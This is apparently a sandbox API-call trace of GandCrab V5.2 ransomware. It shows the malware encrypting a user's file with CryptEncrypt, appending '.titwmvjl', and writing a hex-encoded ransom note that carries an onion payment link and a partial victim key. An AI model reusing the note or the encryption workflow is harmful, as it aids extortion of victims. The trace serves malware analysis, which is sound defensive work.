pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0095.270] GetLastError () returned 0x0 [0095.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.270] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.270] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.270] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0095.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.271] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0095.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.271] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0095.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.271] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0095.271] GetLastError () returned 0x0 [0095.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.272] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.272] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.272] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.272] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.272] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xe59d, lpOverlapped=0x0) returned 1 [0095.284] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff1a63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.284] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe59d, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xe59d, lpOverlapped=0x0) returned 1 [0095.286] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0095.287] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.290] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.291] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.291] CloseHandle (hObject=0x2b4) returned 1 [0095.292] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\1sew_wy8.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\1sew_wy8.mp4.titwmvjl"), dwFlags=0x1) returned 1 [0095.292] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.293] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0095.293] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.293] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.293] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\d2ca4a09d2ca4deb61a.lock" [0095.293] lstrlenW (lpString=".titwmvjl") returned 9 [0095.293] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\d2ca4a09d2ca4deb61a.lock") returned 71 [0095.293] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.293] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 80 [0095.293] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\d2ca4a09d2ca4deb61a.lock") returned 71 [0095.293] lstrlenW (lpString=".lock") returned 5 [0095.293] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.294] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.294] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.294] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.294] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0095.294] lstrcmpW (lpString1="ffP1p0bC-Op3oB", lpString2=".") returned 1 [0095.294] lstrcmpW (lpString1="ffP1p0bC-Op3oB", lpString2="..") returned 1 [0095.294] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\", lpString2="ffP1p0bC-Op3oB" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB" [0095.294] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\" [0095.294] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.294] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.295] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.295] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.295] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.295] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.295] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.295] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\\\TITWMVJL-DECRYPT.txt") returned 83 [0095.295] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0095.296] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x